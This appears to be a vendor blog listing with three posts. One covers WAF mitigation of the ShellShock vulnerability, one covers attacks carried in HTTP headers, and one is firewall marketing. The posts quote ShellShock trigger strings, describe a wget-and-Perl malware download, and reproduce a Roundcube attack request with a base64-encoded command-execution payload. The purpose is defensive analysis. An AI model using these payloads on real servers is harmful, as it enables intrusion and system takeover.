Mitigating “0-day” attacks, which are named like that because the programmer has zero days to fix the flaw, is apparently impossible. However in practice they can be significantly mitigated. We can buy some time by heavily reducing the “vulnerability window” (until the vulnerability is patched or a specific signature is deployed), thus shifting those attacks to be “N-day” attacks. Once a widely used service has a “0-day” publicly disclosed, massive internet scans for vulnerable servers (known also as “campaigns”) are launched almost immediately. Those scans rely on bots either scanning the whole IP range or searching for potential targets using search engines (known as “Google Dorks”). Being a “0-day” attack, there is no complete protection against it. However a good assumption will be that there will pass a certain time until the exploit will evolve enough to include variations and to deploy evasions or to be customized for a specific target. That’s where a good level of a proactive protection required. A typical “0-day” timeline might look like that: A proactive mitigation strategy includes the following ingredients: positive security, proactive negative security, and attack symptoms mitigation. Taking the WAF as an example, positive security might consist of whitelisting only the needed meta-characters (while blocking all other), enforcing HTTP compliance, configuring mandatory request headers, and narrowing down HTTP methods, and file types. And much more can be whitelisted. Whitelisting the entire application (building full positive security model) can be challenging sometimes. It is not less important to rely on proactive attack signatures which are not coupled with a specific CVE, but rather focusing on generic exploitation and evasion patterns and those which try to catch the actual post exploitation payload, regardless of the specific weakness which allowed delivering it in first place. Due to the automation of the “campaign” process, a crucial mitigation factor during the “vulnerability window” might be also relying on detecting automation attack symptoms, such as deploying strong bot detection techniques, blocking TOR exit nodes and having a good IP reputation feed. ShellShock Example I want to use the latest high profile “ShellShock” vulnerability (CVE-2014-6271 and friends), and see how we take this theory into practice. Let’s take some of the popular real attack vectors used in this recent attack and see how specifically BIG-IP ASM detected them using the proactive approach, before there was a designated “ShellShock” signature. The attack vectors are a mix taken from Exploit-DB, Metaslploit, shellshock.py, detectify.com portal, and requests recorded by honeypots. Result of running the vectors against ASM As we can see all of those vectors were blocked. Blocked requests in the ASM event log Let’s dig in and understand what prevented the exploitation. We can see that the exploit is sent via the “User-Agent” header. It is running “/bin/bash” to download the malware using “wget”, running it using Perl and finally removing the malware file itself. Exploit in the wild Signature triggered by an exploit in the wild Without being aware to the actual weakness “() { :;};” which triggers the code execution, the exploit is caught for several reasons. First, we see that it is targeting the “/cgi-bin/bash” location, thus triggering 2 URI signatures looking for this senstive URL (200000034 and 200100316). Second, ASM caught the actual command that performs the server takeover (the “payload”) by a signature that looks for calling executables from “/bin” directory (200003058). This is the exact example of proactive signatures which look for the actual “takeover” payload or the senstive location/resources that are being targeted, rather than only focusing on the exact weakness that opens the door for exploitation. As for postive security, customers who would fence themselves with non legitimate or very rare characters in headers such as “[“, ”]”, ”`”, ”{“, ”}” would have even prevented the 0-day attack itself ( “{“ character in the case of ShellShock ). Several other signatures (2000021069 and 200021092) for automated user-agents, “wget” and “perl”, are also triggered as the payload is delivered throught the user-agent header (which is true for most of the "ShellShock" exploits). Let’s observe another attack vector: shellshock.py exploit Signature triggered by shellshock.py We see the same “/bin” execution signature (200003058), however we also detect a symptom of a suspicious behavior and a signature for automated python client is fired (200021101). While looking on the exploit published on “Exploit-DB” and some other vectors in the wild we see that the only signature that bravely shields against their successful exploitation is the same “/bin” execution signature (200003058). Of course, if there was another command that does not have a corresponding signature (because it is not considered sensitive, most likely causes false positive or just missing) the attack vector could penetrate (like in the case of “() { :; }; ping x.x.x.x” vector). But that’s where our previously mentioned assumption takes place. There is a crucial time, during the “vulnerability window”, just before the exploit expands to several variations or being evolved to other payloads as well. It is not by accident that we can rely on that single signature to buy us some time before the patch is applied. Exploit from Exploit-DB Signature triggered by exploit from “Exploit-DB” Another proactive measure which is directly related to attack symptoms and can serve as a life belt during the “vulnerability period” is using ASM’s bot protection features which incorporates several state-of the art techniques to identify automated bots regardless of the payload they are trying to deliver. Afterword We are not stating that there is a complete protection against previously unknown attacks, however, there is definitely an already existing proactive set of tools that might significantly lower your chances for compromise in a critical exposed period until the full patch is deployed.639Views0likes1CommentI am in your HTTP headers, attacking your application
Zero-day IE exploits and general mass SQL injection attacks often overshadow potentially more dangerous exploits targeting lesser known applications and attack vectors. These exploits are potentially more dangerous because once proven through a successful attack on these lesser known applications they can rapidly be adapted to exploit more common web applications, and no one is specifically concentrating on preventing them because they're, well, not so obvious. Recently, SANS Internet Storm Center featured a write up on attempts to exploit Roundcube Webmail via the HTTP Accept header. Such an attack is generally focused on exploitation of operating system, language, or environmental vulnerabilities, as the data contained in HTTP headers (aside from cookies) is rarely used by the application as user-input. An example provided by SANS of an attack targeting Roundcube via the HTTP Accept header: POST /roundcube/bin/html2text.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Host: xx.xx.xx.xx Accept: ZWNobyAoMzMzMjEyKzQzMjQ1NjY2KS4iICI7O3Bhc3N0aHJ1KCJ1bmFtZSAtYTtpZCIpOw== Content-Length: 54 What the attackers in this example were attempting to do is trick the application into evaluating system commands encoded in the Accept header in order to retrieve some data they should not have had access to. The purpose of the attack, however, could easily have been for some other nefarious deed such as potentially writing a file to the system that could be used as a cross-site scripting attack, or deleting files, or just generally wreaking havoc with the system. This is the problem security professionals and developers face every day: what devious thing could some miscreant attempt to do? What must I protect against. This is part of what makes secure coding so difficult - developers aren't always sure what they should be protecting against, and neither are the security pros because the bad guys are always coming up with a new way to exploit some aspect of an application or transport layer protocols. Think HTTP headers aren't generally used by applications? Consider the use of the custom HTTP header "SOAP Action" for SOAP web services, and cookies, and E-tags, and ... well, the list goes on. HTTP headers carry data used by applications and therefore should be considered a viable transport mechanism for malicious code. So while the exploitation of HTTP headers is not nearly as common or rampant as mass SQL injection today, the use of it to target specific applications means it is a possible attack vector for the future against which applications should be protected now, before it becomes critical to do so. No, it may never happen. Attackers may never find a way to truly exploit HTTP headers. But then again, they might and apparently have been trying. Better safe than sorry, I say. Regardless of the technology you use to, the process is the same: you need to determine what is allowed in HTTP headers and verify them just as you would any other user-generated input or you need to invest in a solution that provides this type of security for you. RFC 2616 (HTTP), specifically section 14, provide a great deal of guidance and detail on what is acceptable in an HTTP header field. Never blindly evaluate or execute upon data contained in an HTTP header field. Treat any input, even input that is not traditionally user-generated, as suspect. That's a good rule of thumb for protecting against malicious payloads anyway, but especially a good rule when dealing with what is likely considered a non-traditional attack vector (until it is used, and overused to the point it's considered typical, of course). Possible ways to prevent the potential exploitation of HTTP headers: Use network-side scripting or mod_rewrite to intercept, examine, and either sanitize or outright reject requests containing suspicious data in HTTP headers. Invest in a security solution capable of sanitizing transport (TCP) and application layer (HTTP) protocols and use it to do so. Investigate whether an existing solution - either security or application delivery focused - is capable of providing the means through which you can enforce protocol compliance. Use secure coding techniques to examine - not evaluate - the data in any HTTP headers you are using and ensure they are legitimate values before using them in any way. A little proactive security can go along way toward not being the person who inadvertently discovers a new attack methodology. Related articles by Zemanta Gmail Is Vulnerable to Hackers The Concise Guide to Proxies 3 reasons you need a WAF even though your code is (you think) secure Stop brute forcing listing of HTTP OPTIONS with network-side scripting What's the difference between a web application and a blog?556Views0likes2CommentsF5 Friday: Goodbye Defense in Depth. Hello Defense in Breadth.
#adcfw #infosec F5 is changing the game on security by unifying it at the application and service delivery layer. Over the past few years we’ve seen firewalls fail repeatedly. We’ve seen business disrupted, security thwarted, and reputations damaged by the failure of the very devices meant to prevent such catastrophes from happening. These failures have been caused by a change in tactics from invaders who seek no longer to find away through or over the walls, but who simply batter it down instead. A combination of traditional attacks – network-layer – and modern attacks – application-layer – have become a force to be reckoned with; one that traditional stateful firewalls are often not equipped to handle. Encrypted traffic flowing into and out of the data center often bypasses security solutions entirely, leaving another potential source of a breach unaddressed. And performance is being impeded by the increasing number of devices that must “crack the packet” as it were and examine it, often times duplicating functionality with varying degrees of success. This is problematic because the resolution to this issue can be as disconcerting as the problem itself: disable security. Seriously. Security functions have been disabled, intentionally, in the name of performance. IT security personnel within large corporations are shutting off critical functionality in security applications to meet network performance demands for business applications. SURVEY: SECURITY SACRIFICED FOR NETWORK PERFORMANCE What the company [NSS Labs] found would likely startle any existing or potential customers: three of the six firewalls failed to stay operational when subjected to stability tests, five out of six didn't handle what is known as the "Sneak ACK attack," that would enable attackers to side-step the firewall itself. Finally, according to NSS Labs, the performance claims presented in the vendor datasheets "are generally grossly overstated." Independent lab tests find firewalls fall down on the job Add in the complexity from the sheer number of devices required to implement all the different layers of security needed, which increases costs while impairing performance, and you’ve got a broken model in need of repair. This is a failure of the defense in depth strategy; the layered, multi-device (silo) approach to operational security. Most importantly, it’s one that’s failing to withstand attacks. What we need is defense in breadth – the height of the stack –to assure availability and security using a more intelligent, unified security strategy. DEFENSE in BREADTH While it’s really not as catchy as “defense in the depth” the concept behind the admittedly awkward sounding phrase is sound: to assure availability and security simultaneously requires a strong security strategy from the bottom to the top of the networking stack, i.e. the application layer. The ability of the F5 BIG-IP platform to provide security up and down the stack has existed for many years, and its capabilities to detect, prevent, and withstand concerted attacks has been appreciated by its customers (quietly) for some time. While basic firewalling functions have been a part of BIG-IP for years, there are certain capabilities required of a firewall – specifically an ICSA certified firewall – that it didn’t have. So we decided to do something about that. The result is the ICSA certification of the BIG-IP platform as a network firewall. Combined with its existing ICSA certification for web application firewall (BIG-IP Application Security Manager) and SSL-TLS VPN 3.0 (BIG-IP Edge Gateway), the BIG-IP platform now supports a full-spectrum security solution in a single, unified system. What is unique about F5’s approach is that the security capabilities noted above can be deployed on BIG-IP Application Delivery Controllers (ADCs)—best known for providing industry-leading intelligent traffic management and optimization capabilities. This firewall solution is part of F5’s comprehensive security architecture that enables customers to apply a unified security strategy. For the first time in the industry, organizations can secure their networks, data, protocols, applications, and users on a single, flexible, and extensible platform: BIG-IP. Combining network-firewall services with the ability to plug the hole in modern security implementations (the application layer) with a platform-based solution provides the opportunity to consolidate security services and leverage a shared infrastructure platform resulting in a more comprehensive, strategic deployment that is not only more secure, but more cost effective. Resources: The Fundamental Problem with Traditional Inbound Protection The Ascendancy of the Application Layer Threat ISCA Certified Network Firewall for Data Centers Mature Security Organizations Align Security with Service Delivery BIG-IP Data Center Firewall Solution – SlideShare Presentation The New Data Center Firewall Paradigm – White Paper Independent lab tests find firewalls fall down on the job SURVEY: SECURITY SACRIFICED FOR NETWORK PERFORMANCE F5 Friday: When Firewalls Fail… Challenging the Firewall Data Center Dogma What We Learned from Anonymous: DDoS is now 3DoS The Many Faces of DDoS: Variations on a Theme or Two F5 Friday: Eliminating the Blind Spot in Your Data Center Security Strategy F5 Friday: Multi-Layer Security for Multi-Layer Attacks523Views0likes0Comments